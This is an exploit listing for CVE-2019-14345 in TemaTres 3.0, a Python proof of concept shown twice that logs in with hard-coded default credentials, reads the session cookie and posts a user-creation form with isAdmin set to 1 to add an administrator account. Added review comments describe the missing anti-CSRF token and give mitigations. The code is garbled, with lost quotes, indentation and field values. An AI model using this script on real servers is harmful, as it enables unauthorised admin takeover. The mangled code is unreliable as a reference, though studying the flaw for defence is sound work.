# Exploit Title: TemaTres 3.0 Cross-Site Request Forgery (Add Admin)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres 3.0/tematres3.0.zip/download
# Version: 3.0
# CVE : CVE-2019-14345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10
# Description:
# Web application for the management of formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.
#Exploit
import requests
import sys
# Proof-of-concept for the TemaTres 3.0 "add admin" request named in the header.
# NOTE(review): the listing lost its string quotes and its indentation in
# extraction, so it is not valid Python as shown. The comments describe only
# what the surviving tokens establish; anything else is marked as a guess.
# NOTE(review): the script does not deliver a cross-site request itself. It
# logs in and replays the user-creation form over its own session, which shows
# the shape of the request the advisory is about.
session = requests.Session()
# All traffic is sent through a local intercepting proxy on 127.0.0.1:8080.
http_proxy = http://127.0.0.1:8080"
https_proxy = https://127.0.0.1:8080"
proxyDict = {
http : http_proxy,
https : https_proxy
}
# Login endpoint is fixed to localhost, while the later admin.php request uses
# the host from argv[1]; the two only agree when argv[1] is http://localhost.
url = http://localhost/tematres/vocab/login.php'
# Hard-coded login form fields. The e-mail value was masked by the page's
# address obfuscation ("[email protected]") and cannot be recovered from here.
values = {id_correo_electronico: [email protected],
id_password: admin,
task:login}
r = session.post(url, data=values, proxies=proxyDict)
# Reads the PHP session id set by the login response. A KeyError here would
# mean no PHPSESSID cookie was issued; the login result itself is not checked.
cookie = session.cookies.get_dict()[PHPSESSID]
# Prints a live session identifier to stdout; treat that output as a secret.
print (cookie)
# Base URL of the application, taken from the first command-line argument.
host = sys.argv[1]
# Attributes of the account to be created, read interactively.
user = input([+]User:)
lastname = input([+]lastname:)
password = input([+]Password:)
password2 = input([+]Confirm Password:)
email = input([+]Email:)
# Client-side check only: the request is sent when both password entries match.
if (password == password2):
# Original note: traffic is expected to pass through Burp (see proxyDict above).
# Form fields posted to admin.php. isAdmin:1 requests an administrator account.
# No anti-CSRF token field appears among them; the request is accompanied only
# by the session cookie, which is the weakness the advisory title names.
# Mitigation on the application side: require a per-session, unpredictable token
# on this form, set SameSite on PHPSESSID, and log or alert on account creation
# with isAdmin set.
data = {
_nombre:user,
_apellido:lastname,
_correo_electronico:email,
orga:bypassed,
# NOTE(review): the next four lines are an extraction artifact. Presumably they
# were two entries mapping _clave and _confirmar_clave to password and
# password2, with ":p" swallowed by an emoticon filter. TODO confirm.
_clave
assword,
_confirmar_clave
assword2,
isAdmin:1,
boton:Guardar,
userTask:A,
# The value for useactua is missing in this listing.
useactua:
}
# Sets the Cookie header by hand; the Session object already carries the same
# PHPSESSID from the login response, so this looks redundant.
headers= {
Cookie: PHPSESSID=+cookie
}
request = session.post(host+/tematres/vocab/admin.php, data=data,
headers=headers, proxies=proxyDict)
# The string arguments of this print were lost in extraction.
print(+ +)
# Only the HTTP status is reported; the script does not verify that the account
# was actually created.
print(Status Code:+ str(request.status_code))
else:
print (Passwords dont match!!!)
# Author: Pablo Santiago
# Date: 2019-11-14
# Vendor Homepage: https://www.vocabularyserver.com/
# Source: https://sourceforge.net/projects/tematres/files/TemaTres 3.0/tematres3.0.zip/download
# Version: 3.0
# CVE : CVE-2019-14345
# Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f
# Tested on: Windows 10
# Description:
# Web application for the management of formal representations of knowledge,
# thesauri, taxonomies and multilingual vocabularies / Aplicación para
# la gestión de representaciones formales del conocimiento, tesauros,
# taxonomías, vocabularios multilingües.
#Exploit
import requests
import sys
# Second copy on this page of the TemaTres 3.0 "add admin" proof-of-concept.
# NOTE(review): string quotes and indentation were lost in extraction, so the
# listing is not valid Python as shown. Comments state only what the visible
# tokens establish.
session = requests.Session()
# Requests go through a local intercepting proxy on 127.0.0.1:8080.
http_proxy = http://127.0.0.1:8080"
https_proxy = https://127.0.0.1:8080"
proxyDict = {
http : http_proxy,
https : https_proxy
}
# Login URL is hard-coded to localhost, independent of the argv[1] host used
# for the admin.php request further down.
url = http://localhost/tematres/vocab/login.php'
# Hard-coded login fields; the e-mail value is masked by the page's address
# obfuscation and is not recoverable from this listing.
values = {id_correo_electronico: [email protected],
id_password: admin,
task:login}
r = session.post(url, data=values, proxies=proxyDict)
# Session id issued by the login response; the login outcome is not checked.
cookie = session.cookies.get_dict()[PHPSESSID]
# Writes the session identifier to stdout; handle that output as sensitive.
print (cookie)
# Application base URL from the first command-line argument.
host = sys.argv[1]
# Details of the account to create, read from the terminal.
user = input([+]User:)
lastname = input([+]lastname:)
password = input([+]Password:)
password2 = input([+]Confirm Password:)
email = input([+]Email:)
# The POST is sent only when the two password entries are equal.
if (password == password2):
# Original note: the proxy configured above is meant to be Burp.
# Fields of the user-creation form sent to admin.php; isAdmin:1 asks for an
# administrator account. The field list contains no anti-CSRF token, so the
# session cookie is the only thing that accompanies the request. Server-side
# fix: a per-session token on the form plus SameSite on the session cookie;
# creation of admin accounts is also worth logging and alerting on.
data = {
_nombre:user,
_apellido:lastname,
_correo_electronico:email,
orga:bypassed,
# NOTE(review): the values for _clave and _confirmar_clave are missing in this
# copy. Presumably they were the password and password2 variables. TODO confirm.
_clave
_confirmar_clave
isAdmin:1,
boton:Guardar,
userTask:A,
# No value for useactua survives in the listing.
useactua:
}
# Cookie header built by hand from the session id read above; the Session
# object would send the same cookie on its own.
headers= {
Cookie: PHPSESSID=+cookie
}
request = session.post(host+/tematres/vocab/admin.php, data=data,
headers=headers, proxies=proxyDict)
# The string arguments of this print did not survive extraction.
print(+ +)
# Reports the HTTP status only; success of the account creation is not verified.
print(Status Code:+ str(request.status_code))
else:
print (Passwords dont match!!!)
